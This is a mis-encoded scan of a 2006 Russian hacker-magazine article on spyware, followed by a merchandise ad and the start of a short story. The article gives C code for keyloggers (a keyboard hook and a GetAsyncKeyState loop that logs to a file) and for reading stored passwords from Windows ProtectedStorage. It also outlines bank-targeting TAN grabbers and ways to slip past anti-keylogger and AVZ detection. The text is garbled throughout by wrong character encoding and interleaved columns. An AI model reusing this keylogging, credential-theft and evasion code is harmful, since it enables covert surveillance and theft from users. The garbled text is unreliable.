Ôóíêöèÿ KeyboardProc áóäåò âûãëÿäåòü ïðèìåðíî òàê: LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam,LPARAM lParam) { if(code != HC_NOREMOVE) if(lParam < 0) if(code == HC_ACTION) { hwnd = FindWindow(szWindowClass, szWindowName); SendMessage(hwnd,WM_LOGGERB, wParam,lParam); } return CallNextHookEx(NULL,code,wParam,lParam); }

Êàê âèäèøü, ýòîò ìåòîä ÷ðåçâû÷àéíî ïðîñò â ðåàëèçàöèè, îäíàêî îí èìååò ñåðüåçíûé íåäîñòàòîê — íåîáõîäèìîñòü íàëè÷èÿ dll. Íà çàãðóçêó òàêîé dll áóäåò ðóãàòüñÿ êîíòðîëü êîìïîíåíòîâ âñåõ ñîâðåìåííûõ ôàéðâîëîâ, ïîýòîìó òîëêó îò ýòîãî ìåòîäà ìàëî, õîòÿ îí åùå èñïîëüçóåòñÿ âî ìíîãèõ spyware. Ðåøèòü ýòó ïðîáëåìó ìîæíî ñ ïîìîùüþ èñïîëüçîâàíèÿ ôóíêöèè GetAsyncKeyState, êîòîðàÿ ïîëó÷àåò èíôîðìàöèþ î ñîñòîÿíèè êëàâèàòóðû (êàêèå êëàâèøè íàæàòû) â ìîìåíò åå âûçîâà. Ôóíêöèÿ â êà÷åñòâå àðãóìåíòà ïðèíèìàåò êîä ïðîâåðÿåìîé êëàâèøè, à âîçâðàùàåò êîä åå ñîñòîÿíèÿ. Äëÿ ñêàíèðîâàíèÿ êëàâèàòóðû íàì íàäî ïåðèîäè÷åñêè âûçûâàòü GetAsyncKeyState ñ êîäàìè âñåõ îòñëåæèâàåìûõ êëàâèø è îòñëåæèâàòü èçìå-

XÀÊÅÐ 01 /85/ 06


Íà äèñêå òû, êàê îáû÷íî, ñìîæåøü îáíàðóæèòü âñå îïèñàííûå â ñòàòüå ñîðöû.

Àíòèâèðóñíóþ óòèëèòó AVZ, î êîòîðîé øëà ðå÷ü â ñòàòüå, òû ìîæåøü ïîäíÿòü òóò: http://z-oleg.com/secur/avz.htm

íåíèÿ â èõ ñîñòîÿíèè. Äëÿ õðàíåíèÿ èíôîðìàöèè î ñîñòîÿíèè êëàâèàòóðû èñïîëüçóåòñÿ ìàññèâ èç 95 ýëåìåíòîâ, çàïîëíåííûé ñòðóêòóðàìè ñëåäóþùåãî ôîðìàòà: typedef struct _VTABLE{ int VIR_KEY; TCHAR Des; } VTABLE;

VIR_KEY — ýòî êîä ïðîâåðÿåìîé êëàâèøè, à Des — ñîñòîÿíèå êëàâèøè.  ýòîì ñëó÷àå êîä, âûïîëíÿþùèé öèêë ñêàíèðîâàíèÿ êëàâèàòóðû, áóäåò âûãëÿäåòü òàê: for(i=0;i<94;i++) if(GetAsyncKeyState(VKeys[i].VIR_KEY) & 0x00000001) if(GetAsyncKeyState(VKeys[i].VIR_KEY) & 0x8000000) { if((VKeys[i].VIR_KEY >=0x41) && (VKeys[i].VIR_KEY <=0x5A)){ if(!( ( GetKeyState(VK_CAPITAL) & 0x000000001 ) ^ ( GetKeyState(VK_SHIFT) <0 ) ) ) { wsprintf(KeyData,"%c",(TCHAR)tolower(VKeys[i].VIR_KEY)); res=WriteFile(hFile,(LPCVOID)KeyData,1,&BW,NULL); if(res==0) SendMessage(hwnd,WM_DESTROY,0,0); break; } } if( (GetKeyState(VK_SHIFT) <0) && IsTrans(VKeys[i].VIR_KEY) ) { wsprintf(KeyData,"%c",(TCHAR)TransKey(VKeys[i].VIR_KEY)); res=WriteFile(hFile,(LPCVOID)KeyData,1,&BW,NULL); if(res==0) SendMessage(hwnd,WM_DESTROY,0,0); break;

ÏÀÐÎËÜÍÛÅ ÒÐÎßÍÛ Ìíîãèì õàêåðàì àáñîëþòíî íåò äåëà äî ëè÷íîé æèçíè ïîëüçîâàòåëÿ è äàæå äî åãî êðåäèòíûõ êàðò. Åìó íóæíî ïðîñòî ñïåðåòü ó íåãî ìûëî, àñþ èëè ÷òî-íèáóäü â ýòîì ðîäå. Äëÿ ýòèõ öåëåé è ñóùåñòâóþò ïàðîëüíûå òðîÿíû âðîäå î÷åíü ïîïóëÿðíîãî Pinch'à. ×àùå âñåãî ðàáîòàþò îíè ïî îäíîìó è òîìó æå íå î÷åíü ñëîæíîìó ïðèíöèïó — ïðîñòî âûäèðàþò âñå ïàðîëè èç õðàíèëèùà ;).  Windows NT ñóùåñòâóåò ñïåöèàëüíàÿ ñëóæáà äëÿ õðàíåíèÿ ïðèâàòíûõ äàííûõ, êîòîðàÿ íàçûâàåòñÿ ProtectedStorage. Èìåííî ýòó ñëóæáó èñïîëüçóåò Internet Explorer äëÿ õðàíåíèÿ ïàðîëåé è òåêñòà äëÿ àâòîçàïîëíåíèÿ ôîðì. Ýòó æå ñëóæáó èñïîëüçóþò MSN Messenger è MS Outlook äëÿ õðàíåíèÿ ñâîèõ ñåêðåòíûõ äàííûõ.  îáùåì, ñîçäàòåëÿì òðîÿíîâ íóæíî ïîáëàãîäàðèòü âåëèêóþ è óæàñíóþ êîìïàíèþ Microsoft, êîòîðàÿ äîøëà äî èäåè õðàíèòü âñå ïàðîëè â îäíîì ìåñòå, ÷åì ñèëüíî îáëåã÷èëà èì æèçíü. Äëÿ ïðîñìîòðà ñîäåðæèìîãî ProtectedStorage ìîæíî èñïîëüçîâàòü ïðîãðàììó Protected Storage Explorer, íî òåáÿ, íàâåðíîå, èíòåðåñóåò íå óòèëèòà, à ïðèíöèï åå ðàáîòû. ×òî æ, ðàññêàçûâàþ. Äëÿ ðàáîòû ñ ProtectedStorage èñïîëüçóþòñÿ ôóíêöèè èç áèáëèîòåêè pstorec.dll, âõîäÿùèå â ñîñòàâ âèíäû. Íà÷èíàåòñÿ âñå ñ ôóíêöèè PStoreCreateInstance, êîòîðàÿ ñîçäàåò îáúåêò êëàññà IPStore. Çäåñü, êàê òû ïîíèìàåøü, ìû âñòðå÷àåìñÿ ñ ýòèì ïðîêëÿòûì ÎÎÏ. Íî íå ñòîèò ïàäàòü è áèòüñÿ â èñòåðèêå îò ýòîãî. Äîñòàòî÷íî ïîíÿòü, ÷òî êëàññ ïðîñòî ïðåäñòàâëÿåò ñîáîé ñòðóêòóðó, â êîòîðîé íàõîäÿòñÿ óêàçàòåëè íà åãî ìåòîäû. Åñëè îïðåäåëèòü ýòó ñòðóêòóðó, òî ìîæíî âûçûâàòü ìåòîäû êëàññà, íå èñïîëüçóÿ Ñ++ è âîçìîæíîñòè ÎÎÏ, à çíà÷èò, ìîæíî ïèñàòü íà ÷èñòîì API î÷åíü ìàëåíüêèå ïðîãðàììû, ÷òî íåìàëîâàæíî äëÿ ñîçäàòåëÿ òðîÿíîâ. Èòàê, ïðèñòóïèì ê äåëó. Äëÿ íà÷àëà íàì íóæíî çàãðóçèòü pstorec.dll, èìïîðòèðîâàòü ôóíêöèþ PStoreCreateInstance è ñîçäàòü ýêçåìïëÿð êëàññà IPStore:

} typedef HRESULT (WINAPI *tPStoreCreateInstance) wsprintf(KeyData,"%s",VKeys[i].Des);

(IPStore **, DWORD, DWORD, DWORD);

res=WriteFile(hFile,(LPCVOID)KeyData,strlen(VKeys[i].Des),&BW,NULL);

HMODULE hpsDLL;

if(res==0) SendMessage(hwnd,WM_DESTROY,0,0);

hpsDLL = LoadLibrary("pstorec.dll");

}

tPStoreCreateInstance pPStoreCreateInstance; pPStoreCreateInstance = (tPStoreCreateInstance)

Äëÿ òîãî ÷òîáû ïîëó÷èòü áîëåå èëè ìåíå ñíîñíûé ëîã, ýòîò öèêë íóæíî ïåðèîäè÷åñêè ïîâòîðÿòü ñ çàäåðæêàìè îêîëî 100 ìñ. Ýòîò ñïîñîá ñëåæåíèÿ çà ââîäîì íå òðåáóåò íàëè÷èÿ áèáëèîòåê, íî îòëè÷àåòñÿ íåêîòîðîé íåñòàáèëüíîñòüþ, òî åñòü íå ãàðàíòèðóåò çàõâàòà âñåõ íàæàòûõ êëàâèø. ÔÎÐÌÃÐÀÁÁÅÐÛ Ôîðìãðàááåðû, ïðèíöèïû ðàáîòû êîòîðûõ ÿ äîñòàòî÷íî ïîäðîáíî îïèñàë â îäíîé èç ñâîèõ ïðåäûäóùèõ ñòàòåé, èñïîëüçóþòñÿ äëÿ ñáîðà èíôîðìàöèè ïî ñòàòèñòèêå ïîñåùåíèÿ ðàçëè÷íûõ ñàéòîâ è àíàëèçà îòïðàâëÿåìîé íà íèõ èíôîðìàöèè. Ãðóáî ãîâîðÿ, îíè ïåðåõâàòûâàþò âñå, ÷òî ïîëüçîâàòåëü ââîäèò â ôîðìû áðàóçåðà. Ó ôîðìãðàááåðîâ ñóùåñòâóåò íåáîëüøîé ïîäâèä — TAN-ãðàááåðû. Èõ îñîáåííîñòü â òîì, ÷òî îíè íàöåëåíû íà ïîëüçîâàòåëåé áàíêîâñêèõ ñèñòåì è óìåþò ðàñïîçíàâàòü ïåðåõâàòûâàåìóþ èíôîðìàöèþ è îòïðàâëÿòü õîçÿèíó òîëüêî íóæíûå äàííûå. Åùå îíè óìåþò íå òîëüêî ïîëó÷àòü ýòè äàííûå, íî è áëîêèðîâàòü èõ ïîñûëêó íà ñàéò áàíêà, ÷òîáû õîçÿèí ñ÷åòà íå ñìîã èì âîñïîëüçîâàòüñÿ äî òîãî, êàê åãî îãðàáÿò. Ñàìûå ïðîäâèíóòûå TAN-ãðàááåðû óìåþò îòêëþ÷àòü ðàçëè÷íûå çàùèòû íà ñàéòå áàíêà (òàêèå êàê îãðàíè÷åíèå äîñòóïà ïî IP), èìèòèðóÿ äåéñòâèÿ ïîëüçîâàòåëÿ ïî óñòàíîâêå íàñòðîåê àêêàóíòà. Ýòà ðàçíîâèäíîñòü øïèîíñêèõ ïðîãðàìì íàèáîëåå îïàñíà, òàê êàê íàïðàâëåíà íà êðàæó ðåàëüíûõ äåíåã. Õî÷ó òåáÿ ïðåäîñòåðå÷ü îò ðàçðàáîòêè è ïðîäàæè ïîäîáíûõ ïðîãðàìì, òàê êàê ýòî ïðÿìàÿ äîðîãà çà ðåøåòêó. Äàæå ó íàñ â Ðîññèè î÷åíü àêòèâíî âåäåòñÿ îõîòà íà êàðäåðîâ.

XÀÊÅÐ 01 /85/ 06

GetProcAddress(hpsDLL, "PStoreCreateInstance"); IPStorePtr PStore; HRESULT hRes = pPStoreCreateInstance(&PStore, 0, 0, 0);

Òåïåðü íàì íóæíî ïîëó÷èòü èíòåðôåéñ IEnumPStoreTypes, ÷åðåç êîòîðûé ìû áóäåì ïåðå÷èñëÿòü òèïû çàïèñåé ProtectedStotrage: IEnumPStoreTypesPtr EnumPStoreTypes; hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes);

Òåïåðü ñäåëàåì öèêë ïåðåáîðà òèïîâ, è äëÿ êàæäîãî òèïà çàïèñè áóäåì ïåðå÷èñëÿòü ïîäòèïû ñ ïîìîùüþ ýòîãî æå èíòåðôåéñà. Äëÿ êàæäîãî òèïà çàïèñåé ìû ïîëó÷àåì TypeGUID — óíèêàëüíîå ÷èñëåííîå çíà÷åíèå, îïèñûâàþùåå äàííûé òèï. Ñðàâíèâ ýòîò òèï ñ èçâåñòíûìè òèïàìè, èñïîëüçóåìûìè Internet Explorer, Outlook Express è äðóãèìè ïîäîáíûìè ïðîãðàììàìè, ìû ïîëó÷èì èíòåðåñóþùèå õàêåðà çàïèñè. Òåïåðü ìû ìîæåì ñ ïîìîùüþ ìåòîäà ReadItem êëàññà IPStore ïðî÷èòàòü ëþáóþ çàïèñü. ß íå áóäó ïðèâîäèòü çäåñü ïîëíûé êîä, òàê êàê îí çàíèìàåò äîâîëüíî ìíîãî ìåñòà, òû åãî ñìîæåøü íàéòè íà äèñêå ê æóðíàëó. Íå íàäåéñÿ íàéòè â ProtectedStorage ñîõðàíåííûå ïàðîëè íà äèàëàï, ïîòîìó ÷òî òóò èõ íåò. Äëÿ òîãî ÷òîáû èõ ïîëó÷èòü, íóæíî ðàáîòàòü ñ RAS, ñëóæáîé óïðàâëåíèÿ äîçâîíîì.Îíà èìååò âñå íóæíûå ôóíêöèè äëÿ ïåðå÷èñëåíèÿ è ÷òåíèÿ ñîõðàíåííûõ ïàðîëåé (GetRasEntryCount, RasEnumEntries, GetLSAData, RasGetEntryProperties). Ïîëíûå èñõîäíèêè àëãîðèòìà èçâëå÷åíèÿ ïàðîëåé òû ìîæåøü ïîñìîòðåòü â ñîîòâåòñòâóþùåì ìîäóëå òðîÿíà Pinch.

125


ÊÎÄÈÍÃ ///// ISSUE Ñ/Ñ++

×ÍÛÅ ÒÜ ÐÀÇËÈ× ×ÀÒ ËÞ× Ò ÎÒÊË ÁÁÅÐÛ ÓÌÅÞÒ ÐÀ à -à AN T ÛÅ Ò Ó ÍÓ ÂÈ Ä ÐÎ Ï Å ÌÛ ÑÀ ÒÀËß ÏÎ ÓÑÒ ÒÅË ËÜÇÎÂÀÒ ÒÂÈß ÏÎË ÑÒ ÅÉ Ä ß Ó ÈÐ Ò ÌÈ È , ÊÀ ÀÍ Á Å Ò ÇÀÙÈÒÛ ÍÀ ÑÀÉ ÒÀ.. ÓÍÒ ÍÎÂÊÅ ÍÀÑÒÐÎÅÊ ÀÊÊÀÓ òóðû äî åãî ïîëó÷àþùåãî ïðèëîæåíèÿ, ÷òîáû ïîíÿòü, ãäå åå ìîæíî ïåðåõâàòèòü è ãäå ýòîò ïðîöåññ ìîæåò áûòü îáíàðóæåí: 1 Äðàéâåð êëàâèàòóðû ïðèíèìàåò ïðåðûâàíèå îò íåå è ñ÷èòûâàåò èíôîðìàöèþ â ñâîé áóôåð. 2 Ïðîöåññ ñåðâåðà ïîäñèñòåìû win32 (csrss.exe) ïîñûëàåò IRP äðàéâåðó êëàâèàòóðû ñ çàïðîñîì íà ïîëó÷åíèå èíôîðìàöèè. 3 Äðàéâåð êëàâèàòóðû Protected Storage Explorer àíòèâèðóñíàÿ óòèëèòà AVZ âîçâðàùàåò IRP-ïàêåò ñ ÑÈÑÒÅÌÛ ÑÁÎÐÀ ÑÒÀÒÈÑÒÈÊÈ èíôîðìàöèåé, ïî ïóòè ïàSpyware-ïðîãðàììû ýòîé êàòåãîðèè ìàëîîïàñíû è ïðåäíàçíà÷åíû äëÿ êåò ïðîõîäèò öåïî÷êó óñòàíîâëåííûõ êëàâèàòóðíûõ ôèëüòðîâ. ñáîðà èíôîðìàöèè î ïðîãðàììíîì îáåñïå÷åíèè, óñòàíîâëåííîì íà 4 csrss.exe îáðàáàòûâàåò ïîñòóïàþùóþ èíôîðìàöèþ è ðàññûëàåò êîìïüþòåðå, î ïîñåùàåìûõ ñàéòàõ è ò.ä. Ðåàëèçàöèÿ âñåãî ýòîãî äå- îêîííûå ñîîáùåíèÿ ïî îæèäàþùèì èõ ïðîöåññàì ÷åðåç ôóíêöèè ëà òðèâèàëüíà (ïåðå÷èñëåíèå ôàéëîâ è çàïèñåé â ðååñòðå). Òåì áî- äðàéâåðà win32k.sys. ëåå çàäà÷ó íàì îáëåã÷àåò íàëè÷èå ïàïêè Temporary Internet Files, â êî- 5 Ïðîöåññ, ïîëó÷àþùèé ñîîáùåíèÿ, âûçûâàåò GetMessage. Ýòà ôóíêòîðîé Internet Explorer ñîõðàíÿåò âñþ èñòîðèþ ïîñåùåíèÿ ñàéòîâ. Íå- öèÿ ïåðåäàåò óïðàâëåíèå â ÿäðî, ãäå âûçûâàåòñÿ NtUserGetMessage èç êîòîðûå ïðîãðàììû ýòîãî êëàññà ëèáî èíòåãðèðóþòñÿ â Internet win32k.sys ÷åðåç òåíåâóþ òàáëèöó ñèñòåìíûõ ñåðâèñîâ (Shadow SDT). Explorer (óñòàíàâëèâàþòñÿ, êàê òóëáàð èëè Shell Extension), ëèáî èñ- 6 Ïðîöåññ ïåðåäàåò ñîîáùåíèå ôóíêöèè TranslateMessage, êîòîðàÿ ïîëüçóþò äðóãèå ìåòîäû ñêðûòîé àâòîçàãðóçêè. Èíòåãðàöèÿ â IE ÷àùå ìîæåò ïåðåäàòü ñîîáùåíèå â ÿäðî ôóíêöèè NtUserTranslateMessage, íåîáõîäèìà äëÿ îáõîäà ôàéðâîëîâ. Õîòü îíè è èìåþò êîíòðîëü êîì- íî äëÿ êëàâèàòóðíûõ ñîîáùåíèé îíà ýòîãî íå äåëàåò. ïîíåíòîâ è âûäàäóò ïðåäóïðåæäåíèå, íî îáû÷íî íèêòî íà ýòî âíèìà- 7 Ñîîáùåíèå ïåðåäàåòñÿ êëàâèàòóðíûì õóêàì, åñëè îíè óñòàíîâëåíû. íèÿ íå îáðàùàåò. Õîòü ýòè ïðîãðàììû è ñ÷èòàþòñÿ íå î÷åíü ñòðàøíû- 8 Ïðîöåññ ïåðåäàåò ñîîáùåíèå ôóíêöèè DispatchMessage, ïîñëå ÷åìè, íî îíè îáû÷íî èìåþò ñèñòåìó àâòîîáíîâëåíèÿ, à çíà÷èò, â ëþáîé ãî îíî îòïðàâëÿåòñÿ â îêîííóþ ïðîöåäóðó. ìîìåíò ìîãóò áûòü èñïîëüçîâàíû äëÿ çàãðóçêè óæå ÷åãî-òî áîëåå 9 Ïîñëå âûïîëíåíèÿ îêîííîé ïðîöåäóðû ñîîáùåíèå âîçâðàùàåòñÿ ñëîæíîãî. ×àñòî òàêèå ïðîãðàììû çàãðóæàþòñÿ íà áîëüøîå êîëè÷å- îáðàòíî â ÿäðî. ñòâî ìàøèí, ñêàíèðóþò èõ, à çàòåì ñîáðàííûå äàííûå èñïîëüçóþò äëÿ Êàê âèäèøü, ïóòü èíôîðìàöèè î êëàâèàòóðíîì ââîäå äîñòàòî÷íî ñëîæåí, òîãî, ÷òîáû îïðåäåëèòü, èìååòñÿ ëè íà êîìïüþòåðå ÷òî-ëèáî ïîëåçíîå è çàùèòíûå ïðîãðàììû íå ìîãóò çàùèòèòü òåáÿ îò ïåðåõâàòà èíôîðìà(íîìåðà êðåäèòíûõ êàðò, íàïðèìåð). Íà òàêèå êîìïû ïðîèçâîäèòñÿ öèè íà âñåì ýòîì ïóòè. Ïðîãðàììû AntiKeylogger è PrivacyKeyboard ìîãóò çàãðóçêà òðîÿíà íàèáîëåå ïîäõîäÿùåãî ïîä ýòîò ñëó÷àé, íàïðèìåð, çàùèòèòü ëèøü ó÷àñòêè 1, 3 è 7, ñëåäîâàòåëüíî, ó õàêåðà îñòàåòñÿ ìîðå ÷åðåç ñèñòåìó àâòîîáíîâëåíèÿ Spyware. âîçìîæíîñòåé íàïèñàòü êåéëîããåð, êîòîðûé îáîéäåò ýòè çàùèòû. Ê ïðèìåðó, ìîæíî ïåðåõâàòèòü èíôîðìàöèþ íà ëþáîé ñòàäèè åå îáðàáîòêè â ÇÀÙÈÒÀ ÎÒ SPYWARE ÿäðå (ïóòåì ìîäèôèêàöèè Shadow SDT èëè êîäà îäíîé èç ôóíêöèé), íî Ùèò è ìå÷. Spyware è AntiSpyware. Äàâàé ïîñìîòðèì, ÷òî æå óãîòîâè- ïîêà â ýòîì íåò íåîáõîäèìîñòè, òàê êàê ìîæíî îáîéòèñü ïåðåõâàòîì user ëè ïðîèçâîäèòåëè ëåãàëüíîãî ñîôòà, ÷òîáû óáåðå÷ü íàñ îò íåõîðî- mode API-ôóíêöèé. Êàê âàðèàíò, ìîæíî ïåðåõâàòèòü ôóíêöèþ øèõ øïèîíîâ. Ïðè÷åì ïîñìîòðèì íà ïðîãðàììû äëÿ ïîèñêà è óäàëå- TranslateMessage è ïîëó÷àòü âñå îêîííûå ñîîáùåíèÿ òàê, êàê áóäòî ìû íèÿ Spyware íå ïî ñèãíàòóðàì, à ïî õàðàêòåðíûì ïðèíöèïàì äåéñòâèÿ óñòàíîâèëè êëàâèàòóðíûé õóê. øïèîíñêèõ ïðîãðàìì. Íà÷íåì ñ óæå óïîìÿíóòîé ïðîãðàììû AVZ. Ïî- Äîïóñòèì, êåéëîããåð íà ïåðåõâàòå API ãîòîâ. Òåïåðü õàêåð áóäåò ìèìî ñèãíàòóðíîãî ïîèñêà, ýòà ïðîãðàììà èìååò âîçìîæíîñòü îáíà- ñïðàâëÿòüñÿ ñ AVZ è äðóãèìè ïîäîáíûìè ïðîãðàììàìè, îáíàðóæèâàðóæèâàòü API-ïåðåõâàòû (êàê â user mode, òàê è íà óðîâíå ÿäðà) è ñêà- þùèìè ïåðåõâàòû. Êàê ýòî íè ïàðàäîêñàëüíî, íî ñàìûé ëó÷øèé ñïîíèðîâàòü LSP (Winsock Layared Service Provider). Ïåðåõâàòû API èñ- ñîá ñêðûòü ïåðåõâàò — ýòî åãî íå óñòàíàâëèâàòü âîîáùå. Íàïðèìåð, ïîëüçóåòñÿ, êàê òû ïîìíèøü, íåêîòîðûìè ôîðìãðàááåðàìè äëÿ ïîëó- åñëè îáðàáîò÷èê íàõîäèòñÿ â DLL, ïîäãðóæàþùåéñÿ âî âñå ïðîöåññû, ÷åíèÿ äàííûõ ôîðì, à òàêæå ìíîãèìè òðîÿíàìè äëÿ ñîêðûòèÿ ñâîåãî òî ìîæíî ïðîñòî íå óñòàíàâëèâàòü ïåðåõâàòû â ïðîöåññå avz.exe, è ïðèñóòñòâèÿ â ñèñòåìå. AVZ ìîæåò íàéòè è ïîêàçàòü ïåðåõâàò÷èê. Ïî- òîãäà AVZ èõ íå óâèäèò. Ýòîò ìåòîä ïðîñò â ðåàëèçàöèè, íî íå ãîäèòëåçíîé âîçìîæíîñòüþ ÿâëÿåòñÿ òàêæå îáíàðóæåíèå êåéëîããåðîâ, óñ- ñÿ äëÿ èñïîëüçîâàíèÿ â ñåðüåçíîì ïðîäóêòå. Ëó÷øå ïðîñòî èñïîëüçîòàíàâëèâàþùèõ ñ ïîìîùüþ SetWindowsHookEx ëîâóøêè. Ïðîòèâ êåé- âàòü ìåòîäû ïåðåõâàòà íåîáíàðóæèâàåìûå ïîäîáíûìè ïðîãðàììàìè. ëîããåðîâ ñóùåñòâóþò òàêæå ñïåöèàëüíûå ïðîãðàììû, òàêèå êàê Íàïðèìåð, ìîæíî ñ ïîìîùüþ äèçàññåìáëåðà äëèí ïðîéòèñü ïî ôóíêHookMonitor, AntiKeylogger è PrivacyKeyboard. Îíè îáåñïå÷èâàþò çà- öèè, íàéòè êîìàíäó ret è ïåðåä íåé ï��ñòàâèòü push ñ àäðåñîì ñâîåãî ùèòó îò øèðîêî ïðèìåíÿåìûõ ìåòîäîâ êåéëîããèíãà. Íàïðèìåð, êîäà. Ñìûñë ýòîãî äåéñòâèÿ â òîì, ÷òî ñòåê â êîíöå ôóíêöèè àíàëîãèAntiKeylogger ïåðåõâàòûâàåò â ÿäðå ôóíêöèè NtUserSendMessage, ÷åí ñòåêó â åå íà÷àëå, push ïåðåçàïèøåò àäðåñ âîçâðàòà, è ret ïåðåNtUserSetWindowsHook, NtUserGetKeyboardState è çàïðåùàåò òàêèå äàñò óïðàâëåíèå íà õàêåðñêèé êîä, îíè ñìîãóò îáðàáîòàòü ðåçóëüòàòû äåéñòâèÿ, êàê óñòàíîâêó êëàâèàòóðíûõ õóêîâ, ñêàí êëàâèàòóðû ÷åðåç âûïîëíåíèÿ ôóíêöèè. GetAsyncKeyState è ñíÿòèå òåêñòà ñ îêîí ïóòåì ïîñûëêè ñîîáùåíèÿ WM_GETTEXT. Ýòè ïðîãðàììû óìåþò äàæå áëîêèðîâàòü äðàéâåðíûå ÒÓÒ È ÑÊÀÇÊÅ ÊÎÍÅÖ êåéëîããåðû, èñïîëüçóþùèå äðàéâåð-ôèëüòð êëàâèàòóðû. Òå, êòî ïîëü- Îò ñîâðåìåííûõ øïèîíñêèõ ïðîãðàìì íåò íèêàêîé íàäåæíîé çàùèòû, çóåòñÿ òàêèìè ïðîãðàììàìè, îáû÷íî èìåþò íà ñâîåì êîìïüþòåðå öåí- êðîìå ãîëîâû äà ïðÿìûõ ðóê. Íå ïîìîæåò íè àíòèâèðóñ, íè ôàéðâîë, íè íóþ èíôîðìàöèþ, êîòîðóþ êòî-òî çàõî÷åò óêðàñòü. Ïîýòîìó õàêåðó ñïåöèàëüíûå ïðîãðàììû. Òîëüêî ïîíèìàíèå ðàáîòû spyware ïîìîæåò îáÿçàòåëüíî íóæíî ðåàëèçîâàòü îáõîä ïîäîáíûõ çàùèòíûõ ñðåäñòâ. îáåçîïàñèòü îò ýòîé íàïàñòè. Íàäåþñü, ÷òî ìàòåðèàë òåáå ïðèãîäèòñÿ. BINARY YOUR’S z Ðàññìîòðèì âñå ýòàïû, êîòîðûå ïðîõîäèò èíôîðìàöèÿ: îò êëàâèà-

126

XÀÊÅÐ 01 /85/ 06


X

ÒÎÂÀÐÛ *

 ÑÒÈËÅ XAKEP STUFF ÊÐÓÆÊÀ + ÔËßÆÊÀ + ÇÀÆÈÃÀËÊÀ

* ÝÊÑÊËÞÇÈÂÍÀß ÊÎËËÅÊÖÈß ÎÄÅÆÄÛ È ÀÊÑÅÑÑÓÀÐÎÂ ÎÒ ÆÓÐÍÀËÀ ÕÀÊÅÐ

«C.I.A. - CENTRAL INTELLIGENCE AGENCY» ÒÎËÑÒÎÂÊÀ

«ÎÏÀÑÍÎ ÄËß ÆÈÇÍÈ» ÊÎÂÐÈÊ ÄËß ÌÛØÈ

Ñ ËÎÃÎÒÈÏÎÌ «ÕÀÊÅл ÏÈÂÍÀß ÊÐÓÆÊÀ ÑÎ ØÊÀËÎÉ

!!

! new

ÖÅÍÀ:

6.99 USD

ÊÎÄ ÒÎÂÀÐÀ: COF13771

ÖÅÍÀ:

39.99 USD

ÊÎÄ ÒÎÂÀÐÀ: COF14827

ÖÅÍÀ:

12.99 USD

ÊÎÄ ÒÎÂÀÐÀ: COF14018

«ÕÀÊÅÐ INSIDE» ÔÓÒÁÎËÊÀ

«WWW - WE WANT WOMEN'' » ÒÎËÑÒÎÂÊÀ

«HACK OFF» ÔÓÒÁÎËÊÀ

«FBI» ÂÅÒÐÎÂÊÀ

«ÕÀÊÅÐ – ÄÅÍÜÃÈ» ÇÀÆÈÌ ÄËß ÄÅÍÅÃ

«ÕÀÊÅл ÊÎÆÀÍÛÉ ØÍÓÐÎÊ ÄËß ÌÎÁÈËÜÍÈÊÀ

Ñ ËÎÃÎÒÈÏÎÌ «ÕÀÊÅл ÇÀÆÈÃÀËÊÀ ÌÅÒÀËËÈ×ÅÑÊÀß

«ÕÀÊÅл ÐÓ×ÊÀ SENATOR ÌÅÒÀË. Ñ ÃÐÀÂÈÐÎÂÊÎÉ

!!!

ED LIMIT

ÖÅÍÀ:

11.99USD

ÊÎÄ ÒÎÂÀÐÀ: COF14590

Èãðàé ïðîñòî! GamePost

ÖÅÍÀ:

11.99 USD

ÊÎÄ ÒÎÂÀÐÀ: COF14591

ÖÅÍÀ:

11.99 USD

ÊÎÄ ÒÎÂÀÐÀ: COF13862

ÖÅÍÀ:

22.99 USD

ÊÎÄ ÒÎÂÀÐÀ: COF13861


TEXT MINDW0RK / mindw0rk@gameland.ru /

Òåñòåð

Àâòîð èëëþñòðàöèé Àííà Æóðêî ; Èâàí Âåëè÷êî

×àñòü òðåòüÿ Êàôå «Ïîðòîâîå» íàõîäèëîñü ðÿäîì ñî ñòàðûì Àðáàòîì. Íèêòî íå çíàë, ïî÷åìó îíî íîñèëî òàêîå íàçâàíèå. Ìîæåò áûòü, âëàäåëüöû ðàññ÷èòûâàëè, ÷òî ýòî ïðèâëå÷åò ìîðÿêîâ è ëþáèòåëåé ìîðñêîé ðîìàíòèêè, à ìîæåò, ïðîñòî âûáðàëè íàóãàä. Ãëàâíîå òî, ÷òî çäåñü áûëî òèõî, óþòíî, è àòìîñôåðà ðàñïîëàãàëà ê îáùåíèþ. À åùå çäåñü ãîòîâèëè ïåðâîêëàññíûå áëèíû.  «Ïîðòîâîì» îíè ñ Æîðêîé ïîçíàêîìèëèñü â ðåàëå â ïåðâûé ðàç, è èìåííî â ýòîì ìåñòå âñòðå÷àëèñü, ÷òîáû ðàçâåÿòüñÿ, ïîïèòü ïèâêà è îáñóäèòü ñâîè âèðòóàëüíûå ðàäîñòè. Îáû÷íî êàôåøêà äåéñòâîâàëà íà Àíäðåÿ óñïîêàèâàþùå. Íî òîëüêî íå ñåãîäíÿ. Îí ïîñìîòðåë íà ÷àñû — ïîëîâèíà ÷åòâåðòîãî, äî íàçíà÷åííîãî Æîðèêîì âðåìåíè îñòàâàëîñü 15 ìèíóò.  æèâîòå çàóð÷àëî, è Àíäðåé òîëüêî ñåé÷àñ îùóòèë, íàñêîëüêî ñèëüíî ïðîãîëîäàëñÿ. Ïîñëåäíèé ðàç îí åë ïî÷òè ñóòêè íàçàä, íà ôóðøåòå â çäàíèè ÂÐÈ. Ñ òåõ ïîð áûëî íå äî åäû. Êîãäà ïîäîøëà îôèöèàíòêà, Àíäðåé çàêàçàë ñâîè ëþáèìûå áëèí÷èêè ñ ãðèáàìè è ñûðîì è ïèâî ñ ôèñòàøêàìè. «…âçðûâ áûë òàêîé ñèëû, ÷òî â äîìàõ âûëåòåëè ñòåêëà, à äåòñêàÿ ïëîùàäêà, íàõîäÿùàÿñÿ ïîä îêíàìè êâàðòèðû, ïîêðûëàñü îñêîëêàìè è ãîðÿùèìè îáëîìêàìè. Æèòåëè ðàéîíà óòâåðæäàþò, ÷òî çà ïîñëåäíèå íåñêîëüêî ëåò íè÷åãî ïîäîáíîãî íå ñëó÷àëîñü, à î ïðè÷èíå âçðûâà îíè íå äîãàäûâàþòñÿ». Ýòî áûëà îáû÷íàÿ ïåðåäà÷à â äóõå «Êðèìèíàëüíîé õðîíèêè», çâó÷àùàÿ ñ òåëåâèçîðà íàä áàðíîé ñòîéêîé, íî íåêîòîðûå îáðûâêè ñëîâ çàñòàâèëè Àíäðåÿ ïðèñëóøàòüñÿ.  êîíöå êîíöîâ îí âñòàë è ïîäîøåë ê ýêðàíó. 